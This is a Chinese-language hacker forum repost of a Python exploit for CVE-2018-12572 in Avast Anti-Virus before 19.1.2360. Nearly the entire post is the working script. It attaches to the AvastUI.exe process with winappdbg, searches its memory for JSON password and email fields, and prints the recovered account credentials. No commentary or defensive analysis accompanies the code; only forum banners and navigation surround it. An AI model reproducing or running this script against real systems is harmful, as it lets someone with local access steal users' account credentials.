Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月4日2年前

# Exploit Title: Avast Anti-Virus Local Credentials Disclosure < 19.1.2360
# Date: 01/18/2019
# Exploit Author: Nathu Nandwani
# Website: http://nandtech.co/
# Version: before 19.1.2360 (build 19.1.4142.0)
# Tested on: Windows 10 x64
# CVE: CVE-2018-12572
# Based on LiquidWorm's and Yakir Wizman's proof of concepts

from winappdbg import Debug, Process

debug = Debug()
processname = "AvastUI.exe"
pid = 0
mem_contents = []

email = ""
password = ""

try:
    debug.system.scan_processes()
    for (process, process_name) in debug.system.find_processes_by_filename(processname):
        pid = process.get_pid()
    if pid is not 0:
        print ("AvastUI PID: " + str(pid))
        process = Process(pid)
        for i in process.search_regexp('"password":"'):
            mem_contents.append(process.read(i[0], 200))
            print "Dump: "
            print process.read(i[0], 200)
        for i in mem_contents:
            password = i.split(",")[0]
        for i in process.search_regexp('"email":"'):
            mem_contents.append(process.read(i[0], 200))
            print "Dump: "
            print process.read(i[0], 200)
        for i in mem_contents:
            email = i.split(",")[0]
        if email != "" and password != "":
            print ""
            print "Found Credentials from Memory!"
            print email
            print password
        else:
            print "No credentials found!"
    else:
        print "Avast not running!"
finally:
    debug.stop()

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索